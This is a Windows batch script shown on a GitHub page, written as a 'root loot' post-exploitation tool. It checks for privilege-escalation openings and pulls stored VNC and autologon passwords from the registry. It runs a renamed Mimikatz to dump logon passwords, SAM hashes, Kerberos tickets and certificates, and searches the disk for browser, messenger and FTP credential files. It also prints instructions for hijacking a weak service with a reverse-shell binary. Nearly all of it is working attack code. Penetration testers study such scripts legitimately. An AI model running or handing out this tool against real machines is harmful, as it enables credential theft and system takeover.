-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathwindows-PE-enum.cmd
664 lines (640 loc) · 25.7 KB
/
windows-PE-enum.cmd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
@echo OFF
call:credits
call:CheckOSbitrate
call:CheckOSversion
call:checkprerequisitefiles
call:checkquickwins
call:getfirewallinformation
call:getcomputerinformation
call:dumphashespasseskerberoscerts
call:findinterestingfiles
call:findinterestingregistrykeys
call:findpasswords
call:checkweakpermissions
call:cleanup
goto end
:credits
echo.----------------------------------------------------
echo.Author: Jollyfrogs, Brisbane QLD
echo.A root loot script I used to learn batch techniquesP, needs TLC
echo.----------------------------------------------------
echo.
goto:eof
:CheckOSbitrate
IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32)
goto:eof
:checkprerequisitefiles
REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE
echo ====================================================================
echo ====================== IGNORE THESE ERRORS =========================
dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL
IF %ERRORLEVEL% == 0 set jollykatz=1
for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a
for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a
REM
REM check registry for the following registry entries:
REM
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
IF %ERRORLEVEL% == 0 (
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
IF %ERRORLEVEL% == 0 (set alwaysinstallelevated=1)
)
reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL
IF %ERRORLEVEL% == 0 (set IE6found=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL
IF %ERRORLEVEL% == 0 (set IE7found=1)
reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set AIM6found=1)
reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL
IF %ERRORLEVEL% == 0 (set AIMPROfound=1)
reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL
IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)
reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL
IF %ERRORLEVEL% == 0 (set BIGANTfound=1)
reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL
IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)
reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)
reg query "HKCU\SOFTWARE\IMVU" 1>NUL
IF %ERRORLEVEL% == 0 (set IMVUfound=1)
reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL
IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)
reg query "HKCU\SOFTWARE\Paltalk" 1>NUL
IF %ERRORLEVEL% == 0 (set PALTALKfound=1)
reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL
IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)
reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL
IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)
reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL
IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)
reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL
IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)
reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set IDMfound=1)
reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL
IF %ERRORLEVEL% == 0 (set PICASAfound=1)
reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set realvncpassfound=1)
reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)
reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)
reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)
reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL
IF %ERRORLEVEL% == 0 (
For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b
REM we check if the registry key is not null
IF NOT [%defaultloginpass%] == [] set winautologinpassfound=1
set defaultloginpass=
)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)
REM
REM
echo ====================== IGNORE THESE ERRORS =========================
echo ====================================================================
echo.
goto:eof
:CheckOSVersion
@echo off
ver | find "2003" > nul
if %ERRORLEVEL% == 0 goto ver_2003
ver | find "XP" > nul
if %ERRORLEVEL% == 0 goto ver_xp
ver | find "2000" > nul
if %ERRORLEVEL% == 0 goto ver_2000
ver | find "NT" > nul
if %ERRORLEVEL% == 0 goto ver_nt
if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit
systeminfo | find "OS Name" > %TEMP%\osname.txt
FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i
echo %vers% | find "Windows 7" > nul
if %ERRORLEVEL% == 0 goto ver_7
echo %vers% | find "Windows Server 2008" > nul
if %ERRORLEVEL% == 0 goto ver_2008
echo %vers% | find "Windows Vista" > nul
if %ERRORLEVEL% == 0 goto ver_vista
goto warnthenexit
:ver_7
:Run Windows 7 specific commands here.
set OSVersion=WIN7
goto versioncheckexit
:ver_2008
:Run Windows Server 2008 specific commands here.
set OSVersion=WIN2008
goto versioncheckexit
:ver_vista
:Run Windows Vista specific commands here.
set OSVersion=WINVISTA
goto versioncheckexit
:ver_2003
:Run Windows Server 2003 specific commands here.
set OSVersion=WIN2003
goto versioncheckexit
:ver_xp
:Run Windows XP specific commands here.
set OSVersion=WINXP
goto versioncheckexit
:ver_2000
:Run Windows 2000 specific commands here.
set OSVersion=WIN2000
goto versioncheckexit
:ver_nt
:Run Windows NT specific commands here.
set OSVersion=WINNT
goto versioncheckexit
:versioncheckwarnthenexit
set OSVersion=UNDETERMINED
goto:versioncheckexit
:versioncheckexit
goto:eof
:checkquickwins
systeminfo > systeminfo.txt
REM === Generic tests across all Windows versions here
IF DEFINED alwaysinstallelevated (
echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****
set alwaysinstallelevated=
echo.
)
IF DEFINED realvncpassfound (
echo **** !!! REALVNC PASS FOUND !!! ****
reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"
echo ************************************
set realvncpassfound=
echo.
)
IF DEFINED tightvncpassfound1 (
echo **** !!! TIGHTVNC PASS FOUND !!! ****
reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"
echo *************************************
set tightvncpassfound1=
echo.
)
IF DEFINED tightvncpassfound2 (
echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****
reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"
echo **********************************************
set tightvncpassfound2=
echo.
)
IF DEFINED tigervncpassfound (
echo **** !!! TIGERVNC PASS FOUND !!! ****
reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"
echo *************************************
set tigervncpassfound=
echo.
)
IF DEFINED vnc3passfound1 (
echo **** !!! VNC3 PASS FOUND !!! ****
reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"
echo *********************************
set vnc3passfound1=
echo.
)
IF DEFINED vnc3passfound2 (
echo **** !!! VNC3 PASS FOUND !!! ****
reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"
echo *********************************
set vnc3passfound2=
echo.
)
IF DEFINED vnc3passfound3 (
echo **** !!! VNC3 PASS FOUND !!! ****
reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"
echo *********************************
set vnc3passfound3=
echo.
)
IF DEFINED winautologinpassfound (
echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"
echo **********************************************
IF DEFINED Winautologinuserfound (
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"
set winautologinuserfound=
)
IF DEFINED winautologindomainfound (
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"
set winautologindomainfound=
)
set winautologinpassfound=
)
goto:eof
if %OSVersion%==WINXP (
REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches
REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a
REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj
REM set MYKB=
REM echo.
)
goto:eof
:getfirewallinformation
echo.
IF DEFINED netshfirewall (
echo.
echo.Firewall Status
echo.---------------
netsh firewall show state
echo.
echo.
echo.Firewall configuration details
echo.------------------------------
echo.
netsh firewall show config
echo.
) ELSE (
echo === NOTE: The netsh firewall command was not found, skipping checks ===
)
echo.
goto:eof
:getcomputerinformation
echo.
echo.This computer is running %OSbit%-bit Windows
echo.
IF DEFINED whoami (
echo.
echo.Are we running an elevated command prompt?
echo.------------------------------------------
for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a
IF DEFINED runningelevatedprompt (
echo YES, we ARE!
) ELSE (
echo Sadly, no...
)
echo.
echo.User Groups
echo.-----------
whoami /groups
echo.
) ELSE (
echo === NOTE: The whoami command was not found, skipping checks ===
)
echo.
echo.User Accounts
echo.-------------
net users
echo.
echo.Systeminfo
echo.----------
systeminfo
echo.
echo.Netstat -ano
echo.------------
netstat -ano
echo.
echo.Scheduled tasks
echo.---------------
schtasks /query /fo LIST /v
echo.
echo.Task to service mapping
echo.-----------------------
tasklist /SVC
echo.
echo.Network settings
echo.----------------
ipconfig /all
echo.
echo.Running windows services
echo.------------------------
net start
echo.
echo.Listing Windows drivers
echo.-----------------------
DRIVERQUERY
echo.
echo.Dumping Windows registry to registrydump.txt
echo.--------------------------------------------
reg query HKLM /s > registrydump.txt
reg query HKCU /s >> registrydump.txt
echo.
echo.Environment variables
echo.---------------------
set
echo.
echo.Group Policy
echo.------------
gpresult /R 1>2>NUL
IF %ERRORLEVEL% == 1 (
REM WINXP
gpresult
) ELSE (
REM WIN7
gpresult /R
)
echo.
REM ** ALEX TO ADD CREDENUMERATE **
goto:eof
:dumphashespasseskerberoscerts
echo.Hashes, passwords, kerberos tickets and certificates
echo.-----------------
IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===
IF NOT DEFINED jollykatz goto:eof
echo.
echo.sekurlsa::logonPasswords full
echo.------
jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
echo.
echo.lsadump::sam
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
echo.
echo.sekurlsa::tickets /export
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit"
echo.
goto:eof
:findinterestingfiles
echo.Interesting files and directories
echo.---------------------------------
dir C:\* /a/s/b > dirlisting.txt
type dirlisting.txt | findstr /I \.*proof[.]txt$
type dirlisting.txt | findstr /I \.*network-secret[.]txt$
type dirlisting.txt | findstr /I \.*ssh.*[.]ini$
type dirlisting.txt | findstr /I \.*ultravnc[.]ini$
type dirlisting.txt | findstr /I \.*vnc[.]ini$
type dirlisting.txt | findstr /I \.*bthpan[.]sys$
type dirlisting.txt | findstr /I \.*\\repair$
type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$
type dirlisting.txt | findstr /I \.*[.]vnc$
type dirlisting.txt | findstr /I \.*groups[.]xml$
type dirlisting.txt | findstr /I \.*printers[.]xml$
type dirlisting.txt | findstr /I \.*drives[.]xml$
type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$
type dirlisting.txt | findstr /I \.*services[.]xml$
type dirlisting.txt | findstr /I \.*datasources[.]xml$
type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$
type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$
type dirlisting.txt | findstr /I \.*[.]dbx$
type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$
type dirlisting.txt | findstr /I \.*ntds[.].*$
type dirlisting.txt | findstr /I \.*hiberfil[.].*$
type dirlisting.txt | findstr /I \.*boot[.]ini$
type dirlisting.txt | findstr /I \.*win[.]ini$
type dirlisting.txt | findstr /I \.*.\\config\\RegBack
type dirlisting.txt | findstr /I \.*.\\CCM\\logs
type dirlisting.txt | findstr /I \.*.\\iis.[.]log$
type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$
type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles
type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$
type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$
type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*.
type dirlisting.txt | findstr /I \.*.syspre.*,[.]...$
type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$
type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$
type dirlisting.txt | findstr /I \.*Login.Data$
type dirlisting.txt | findstr /I \.*Web.Data$
type dirlisting.txt | findstr /I \.*Credentials.Store$
type dirlisting.txt | findstr /I \.*Credential.Store$
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
REM Avant Browser:
type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$
type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$
REM Comodo Dragon
type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.*
REM CoolNovo
type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.*
REM Firefox
type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$
type dirlisting.txt | findstr /I \.*key3[.]db$
REM Flock Browser
type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.*
REM Google Chrome
type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.*
type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.*
REM Internet Explorer
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
REM Maxthon
type dirlisting.txt | findstr /I \.*MagicFill.*
type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$
REM Opera
type dirlisting.txt | findstr /I \.*Wand[.]dat$
REM Safari
type dirlisting.txt | findstr /I \.*keychain[.]plist$
REM SeaMonkey
type dirlisting.txt | findstr /I \.*signons[.]sqlite$
REM AIM
type dirlisting.txt | findstr /I \.*aimx[.]bin$
REM Digsby
type dirlisting.txt | findstr /I \.*logininfo[.]yaml$
type dirlisting.txt | findstr /I \.*digsby[.]dat$
REM Meebo Notifier
type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$
REM Miranda IM
type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$
REM MySpace IM
type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$
REM Pidgin
type dirlisting.txt | findstr /I \.*Accounts[.]xml$
REM Skype
type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$
REM Tencent QQ
type dirlisting.txt | findstr /I \.*Registry[.]db$
REM Trillian
type dirlisting.txt | findstr /I \.*accounts[.]ini$
REM XFire
type dirlisting.txt | findstr /I \.*XfireUser[.]ini$
REM Foxmail
type dirlisting.txt | findstr /I \.*Account[.]stg$
type dirlisting.txt | findstr /I \.*Accounts[.]tdat$
REM ThunderBird
type dirlisting.txt | findstr /I \.*signons[.]sqlite$
REM Windows Live Mail
type dirlisting.txt | findstr /I \.*[.]oeaccount$
REM FileZilla
type dirlisting.txt | findstr /I \.*recentservers[.]xml$
REM FlashFXP
type dirlisting.txt | findstr /I \.*Sites[.]dat$
REM FTPCommander
type dirlisting.txt | findstr /I \.*Ftplist[.]txt$
REM SmartFTP
type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$
REM WS_FTP
type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$
REM Heroes of Newerth
type dirlisting.txt | findstr /I \.*login[.]cfg$
REM JDownloader
type dirlisting.txt | findstr /I \.*JDownloader.*
type dirlisting.txt | findstr /I \.*database[.]script$
type dirlisting.txt | findstr /I \.*accounts[.]ejs$
REM OrbitDownloader
type dirlisting.txt | findstr /I \.*sitelogin[.]dat$
REM Seesmic
type dirlisting.txt | findstr /I \.*data[.]db$
REM SuperPutty
type dirlisting.txt | findstr /I \.*sessions[.]xml$
REM TweetDeck
type dirlisting.txt | findstr /I \.*TweetDeck.*
type dirlisting.txt | findstr /I \.*[.]localstorage$
echo.
goto:eof
:findinterestingregistrykeys
REM Source: securityxploded dot com slash passwordsecrets dot php
IF EXIST AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")
IF EXIST AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")
IF EXIST IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")
IF EXIST IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")
IF EXIST BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")
IF EXIST BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")
IF EXIST CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")
IF EXIST GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")
IF EXIST IMVUfound (reg query "HKCU\SOFTWARE\IMVU")
IF EXIST NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")
IF EXIST PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")
IF EXIST YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")
IF EXIST INCREDIMAIL (reg query "HKCU\SOFTWARE\IncrediMail")
IF EXIST OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")
IF EXIST OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles")
IF EXIST OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles")
IF EXIST OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts")
IF EXIST OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")
IF EXIST DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")
IF EXIST GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")
IF EXIST IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")
IF EXIST PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")
REM
:findpasswords
echo.Searching for passwords (this can take a while)
echo.-----------------------------------------------
findstr /si pwd= *.xml *.ini *.txt
findstr /si password= *.xml *.ini *.txt
findstr /si pass= *.xml *.ini *.txt
goto:eof
:checkweakpermissions
echo.Searching for weak service permissions (this can take a while)
echo.--------------------------------------------------------------
if exist serviceexes.txt del serviceexes.txt
if exist dirlisting.txt del dirlisting.txt
dir \ /a/s/b > dirlisting.txt
for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt
REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo
REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)
REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead
REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
echo.Files and folder with Read-Write access
echo.---------------------------------------
dir accesschk.exe /a/s/b 1>2>NUL
IF %ERRORLEVEL% == 0 (
echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===
goto:eof
)
accesschk.exe /accepteula 1>2>NUL
accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
accesschk.exe -uwqs "Authenticated Users" c:\*.* | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.
echo.Searching for weak service permissions
echo.--------------------------------------
accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****
accesschk.exe -uwcqv "Authenticated Users" *
echo.****************************************************************
echo.
)
accesschk.exe /accepteula 1>2>NUL
accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****
accesschk.exe -uwcqv "Users" *
echo.*******************************************************
echo.To plant binary in service use:
echo.sc config [service_name] binpath= "C:\rshell.exe"
echo.sc config [service_name] obj= ".\LocalSystem" password= ""
echo.sc qc [service_name] (to verify!)
echo.net start [service_name]
echo.*******************************************************
)
accesschk.exe /accepteula 1>2>NUL
accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****
accesschk.exe -uwcqv "Everyone" *
echo.*******************************************************
echo.To plant binary in service use:
echo.sc config [service_name] binpath= "C:\rshell.exe"
echo.sc config [service_name] obj= ".\LocalSystem" password= ""
echo.sc qc [service_name] (to verify!)
echo.net start [service_name]
echo.*******************************************************
goto:eof
:cleanup
set jollykatz=
set accesschk=
set OSbit=
set whoami=
set runningelevatedprompt=
set netshfirewall=
